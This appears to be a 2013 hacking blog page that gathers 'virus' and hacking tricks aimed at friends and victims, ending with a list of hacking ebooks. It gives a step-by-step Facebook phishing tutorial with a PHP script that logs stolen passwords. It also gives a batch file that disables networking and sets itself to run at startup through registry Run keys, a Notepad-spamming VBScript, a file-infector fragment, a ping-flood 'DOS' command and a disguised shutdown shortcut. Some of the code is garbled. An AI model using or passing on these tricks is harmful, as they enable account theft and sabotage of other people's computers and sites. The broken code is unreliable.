Definition List

4 Dec 2013

Making Notepad Tsunam Virus

 NoTePaD  TsuNaM!  V!rUs

·                Effect –>  Harmful n Effective, Cause system crash easily.
·                Coding Platform –>  VBscript or note pad
·                Working –>  On Executing, it opens notepad unlimited no. of times and write a text into notepad automatically. It looks very scary for normal users as it leads to system hang and crash system in few minutes.
Just type the code or copy it on notepad and save it as anyname with “.vbs” extension.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.SendKeys “H”
WScript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “o “
WScript.Sleep 200
WshShell.SendKeys ” “
WScript.Sleep 200
WshShell.SendKeys “u”
WScript.Sleep 200
Wshshell.Sendkeys “s”
Wscript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “r”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “…”
WScript.Sleep 200
WshShell.SendKeys “{enter}”
WScript.Sleep 200
WshShell.SendKeys “You”
WScript.Sleep 200
WshShell.SendKeys ” Have”
WScript.Sleep 200
WshShell.SendKeys ” Been”
WScript.Sleep 200
WshShell.SendKeys ” Hacked!!!”
WScript.Sleep 200
WshShell.SendKeys ” Now”
WScript.Sleep 200
WshShell.SendKeys ” Just”
WScript.Sleep 200
WshShell.SendKeys ” Taste”
WScript.Sleep 200
WshShell.SendKeys ” What”
WScript.Sleep 200
WshShell.SendKeys ” Virus”
WScript.Sleep 200
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….”
WScript.Sleep 200
WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “look”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “how”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 100
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “crash”
wscript.sleep 200
wshshell.sendkeys ” uR”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “system”
wscript.sleep 200

Making Clone Virus

·    Effect –>  Harmful and very effective.
·    Coding Platform –>  C, Turbo C.
·   Working : on execution this virus does is it makes all the files in the current directory a virus. Just remember to run this virus inside a new folder that contains no important exe and normal files . This virus will make them too as virus.
FILE *Ron *vRon;
int owned = 0;
unsigned long x;
char buff[256];
struct ffblk ffblk;
clock_t st, end;
 owned=(find_first(“*.*”, &ffblk,0);
 Ron=fopen(_arg[0], “rb”);
 vhost=fopen(ffblk.ff_name, “rb+”);
 if (vhost = =NULL)
 goto next;
 x = 89088;
 printf(“infecting %s\n”, ffblk.ff_name);
 x – = 2048;
 next:      fcloseall();
 owned = findnext(&ffblk);
 end = clock()
 printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk);
 return (0);

Facebook Hacking

Facebook is one of the best social networking website. All of you want to hack your friends , girlfriends/boyfriends facebook account to know what they are doing. And from last few days many of you were asking HOW TO HACK A FACEBOOK ACCOUNT. So This post is for all of you who were asking me how to hack a facebook account.

So now i am starting to show you how to hack someone by phishing
STEP 1: Go to Facebook
Right click on the white space of the front page under the logo.

"View Page source".
Copy the code to Notepad. not wordpad

STEP 2: Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:

You have to change two things in that code..first of all you have to change method from POST to You can see in picture.
and secondly you have to change ACTION from"
to "next.php"

Save the document as index.html

& Change the file type as All Files.


Now we need to create the "next.php" to store the password.  so open the notepad and type the code given below:

header("Location: ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

save this file as "next.php"

Step 4:

open the notepad and Now create a blank file and named it as  "passwords.txt".
Now onwards You have three files..first is "index.html".Second is "next.php" and third is "passwords.txt"
Now we have to upload this three files on a php web hosting service.
many sites offers this kind of hosting services.but maximum of them are now stopped these services cause of use of them in hacking.others are still running but they are Providing paid services only.

so guys there are only few sties like On internet , which is an industry leader in providing top class free web hosting services without advertising! There are no hidden costs, no adverts, and no restrictive terms. and there are only some sites which allows our phishing page
So now lets come to topic again...

STEP 5: Go to on  free webhost eg:- 

other website may identify the page

and click on sign up. and select any domain name eg :-

STEP 6:After doing above steps you have to verify your mail account that you used at the time of signup process.Verify your mail account.

STEP 7:Click on the site link which is shown under DOMAIN section to go to your control panel alternativly You can go to
for fake page uploading.

STEP 8: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered,

 and then Go to File Manager under Files and log into it.

STEP 9: After logging to Your File manager Section. Now Click on the Public_html directory.

 STEP 10: Before proceeding to next delete default.php under public_html directry.Now click on the Upload button, choose the three file that we created earlier.(index.html, next.php and passwords.txt).

STEP 11: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, the username and password would be go to "passwords.txt" file.

STEP 12: Now Everything is set. The Only thing that we have to do is that pass the link to victim.after that if he/she login through that link then we are able to get his/her account and password.

                                               FOR EDUCATION PURPOSE ONLY !!!

How To Unlock Password of Android Phone And Tablet

1.First of all Power Off your device.

2.After this just press Up Volume Key and hold it.

3.Now press the power button and hold it.

4.It will start a secret terminal.

5.You can use home button for go up and down.

6.You can use option DELETE ALL USER DATA.

7.It will take some time, and problem is solved.

Warning :- if u use this trick then the data of your mobile will be lost.

Creating shortcut to HIBERNATE your Computer.

--------------- ---------------
--------------- -------------
Hibernation mode in a computer
allows us to save a lot of power
and we can restart the computer
as its when it was turned off.
Now you are going to learn how
to create a short cut icon for
hibernation mode, so that we can
put our computer into the
hibernation mode(in windows 7)
as quick as possible.
--------------- ---------------
--------------- ---------------
1. In your desktop of the
computer right-click in the empty
space and click on "new short
cut" form the context tab.

2. Now a window will pop up
which will guide you in creating
the short cut. In that field type
em32\rundll32.e xe powrprof.dll,
SetSuspendState 0,1,0

3. Now name the short cut as
"Hibernate" or as you wish.

4. Now you can find the short cut
on your desktop.

5.You might think that the icon
does not have an attractive look.
Now let us change the icon's

6.Click the Shortcut Tab and left
click the Change Icon tab.

7. "In the Look for icons in this file
" paste the following then hit
stem32\SHELL32. dll

8. Now a group of icons will pop
up and from that you can select
your desired icon.

Trick to make Virus which can Disable Internet Permanently

There is a Trick to make Virus which can Disable Internet Permanently. To do this follow these simple steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

echo @
echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d
:windowswimn32.bat /f reg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!

3) Save it as Internet Disabled.bat.

4) Now it is done. So it is a simple Trick to make Virus which can Disable Internet Permanently.

And Give this file to your friend... But try At own your Risk.

DOS Attack Manually

First Open Cmd
From Run => Cmd
Now Follow These Steps -:

1. Now Type This Command In CMD :

2. Now Type =>ping (i.p of site) –t –l 65000
here 65000 is packets

And You Will Get The I.P of Victim

Now Your PC Will Send A Huge Traffic To That Site…

Check That Site After 1 Hours it will be Down..!!!
Try This From More PC For A Good Response..!!

Double click on Internet explorer to Restart the Computer

1) Goto Desktop

2) Right click > new > Shortcut

3) In “Type the Location of the item” > write: “C:\WINDOWS
\system32\shutdown.exe -r -t 00? without coutes.

4) Click next and in “Type a name for this shortcut” write ”
Internet Explorer” and click Finish.

5) Now Right Click on the shortcut of Internet Explorer and
goto “Change Icon” and select the icon of Internet

6) Now Virus is Ready… haha.. check it out.. when you will
double click on Internet Explorer Shortcut… Computer will

Virus to destruct hard drive

Hi friends! There is a Trick to make a Virus which
can Format and Destroy Hard Drive using Notepad.
This Virus can be used to annoy your friends or
enemy. Touse this Trick follow the simple steps
given below :

1) Open Notepad.
2) Copy and Paste the given Code into Notepad :
3) Save it as HardDriveVirus.exe.
4) Now it is done.
5) Don't Run this Fle on your Own Computer. If you
run this file the Hard Drive would be Formated.

WARNING- Don't try this on your own PC.

17 Nov 2013

Backtrack 5 Wireless Penetration Testing Begineer's Ebook

Backtrack 5 Wireless Penetration Testing Beginner's Guide will take you through the journey of becoming a Wireless hacker. You will learn various wireless testing methodologies taught using live example which you will implement throughout this book. The engaging practical sessions very gradually grow in complexity giving you enough time to ramp up before you get to advanced wireless attacks.

This book will take you through the basic concepts in Wireless and creating a lab environment for your experiments to the business of different lab sessions in wireless security basics, slowly turn on the heat and move to more complicated scenarios, and finally end your journey by conducting bleeding edge wireless attacks in your lab.

List Of Topic Covered In This Book

Create a Wireless Lab for conducting experiments

Monitor the air and sniff wireless packets

Bypass WLAN authentication mechanism

Crack WEP/WPA/WPA2 encryption mechanisms

Break into a WLAN network using infrastructure flaws

Break into a Wireless client such as a laptop

Advanced attacks such as Man-in-the-Middle attacks and Evading WIPS

Conduct wireless penetration test in a methodical way

24 Great E-Books On Ethical Hacking

24 Great E-Books On Ethical Hacking

Are you an aspiring hacker who wants to get as much info on hacking from online free ebooks as possible but doesn’t know where to get them? We bring you a list of 24 great e-books on hacking with links for their free downloads. Happy reading!

1. Black Book of Viruses and Hacking : In print for over five years, the book opens a door to answering questions on whether or not it is better to make technical information about computer viruses known or not. 

2. The Beginner’s Guide To Hacking Computers Systems : This is a great book for guiding beginners through the basic and advanced steps of hacking. It helps develop user knowledge on various types of hacking including windows, Linux installation & use, Linux hacking, virus programming, malware programming and Trojan programming among other things.

3. Penentration Testing With Backtrack : The book has been written in Packt's Beginner's Guide format and helps the reader gain knowledge of concepts and understand the techniques to perform wireless attacks in your lab. 

4. Hacker’s High School : This book is used by over a quarter of a million students every year and is a straightforward, inexpensive quick reference, with content flexible enough to suit the needs of writers in the humanities, social sciences, sciences, health professions, business, fine arts, education, and beyond.

5. Black Belt Hackers And Complete Hacking : The book addresses the fundamental question of what is ethical hacking in its most elementary form and is a great reference book for beginners.

6. Secrets Of Super And Professional Hackers : The book covers hacking scenarios ranging from the merely mischievous to the criminal, the super hacker known as the Knightmare gives step-by-step instructions in meaningful hacking from a personal computer.

7. Dangerous Google Hacking Database and Attacks: The book takes a look into several case studies on dangerous attacks that have been carried out in the past and how these could have been prevented.

8. Internet Advanced Denial of Service (DDOS) Attack : This book sheds light on the complex form of computer attack that impacts the confidentiality, integrity, and availability of millions of computers worldwide.

9. Computer Hacking & Malware Attacks for Dummies: This is a book on preventive techniques and examines some great security measures which are present across the world. The great thing is that it has been updated to cover the latest hacks for Windows 7 and the newest version of Linux.

10. G-mail Advance Hacking Guides and Tutorials : Another great book on preventive techniques, the book is a lesson on how to secure Gmail, the world’s most used emailing service.

11. Vulnerability Exploit & website Hacking for Dummies : The book has some brilliant insights into Metasploit, and its commercial equivalent CORE IMPACT. It provides the ultimate ethical hacker's pot of gold — a screenshot of a critical server's command prompt.

12. Web App Hacking (Hackers Handbook): This is a highly successful book and now comes with great insights into web applications, which are now the front door to most organizations, exposing them to attacks that may disclose personal information, execute fraudulent transactions, or compromise ordinary users.

13. Security Crypting Networks and Hacking: Now in its second edition, the book offers 125 concise and practical hacks, including more information for Windows administrators, hacks for wireless networking. 

14. Botnets: The Killer Web Application Hacking: The book is based on real world cases of botnet attacks to underscore the need for action and used public domain tools like OurMon.

15. Hacking Attacks and Examples Test: The book is a step by step on how-to drilldowns for installing and configuring your Tiger Box operating systems, installations, and configurations for some of the most popular auditing software suites.

16. Gray Hat Hacking and Complete Guide to Hacking: This is an insight into thwarting malicious network intrusion by using cutting-edge techniques for finding and fixing security flaws.

17. Advance Hacking Exposed Tutorials: This book works brilliantly for those looking to finding out about how a fail-safe system was cracked and how one can better protect oneself.

18. 501 Website Hacking Secrets: "This book concisely identifies the types of attacks which are faced daily by Web 2.0 sites, and the authors give solid, practical advice on how to identify and mitigate these threats." --Max Kelly, CISSP, CIPP, CFCE, Senior Director of Security, Facebook. One needn’t say more.

19. Internet Security Technology and Hacking: The book addresses questions on whether hacking attacks are morally justified? Hacking, Counterhacking, and Society is a valuable addition to the library of anyone concerned with the growing number of Internet security issues and intrusions facing society today.

20. CEH Certified Ethical Hacker Study Guide: The books lets you prepare for the challenging CEH Certified Ethical Hackers exam and provides a full coverage of exam topics, real-world examples, and includes a CD with chapter review questions, two full-length practice exams, electronic flashcards and a glossary of key terms.

21. Advanced SQL Injection Hacking and Guide: The book ensures that IT professionals apply security principles in the context of their daily job scope

22. Web Hacking & Penetration Testing: The books serves as an introduction to the steps required to complete a penetration test or perform an ethical hack.

23. OWASP Hacking Tutorials and Web App Protection: The book gives detailing on the different tools for exploitation, about metasploit and armitage. 

24. CEH - Hacking Database Secrets and Exploit: This book gets into the latest edition gets into current threats and details the new menace of APT (advanced persistent threats), embedded hacking, database hacking, and significant coverage of mobile devices.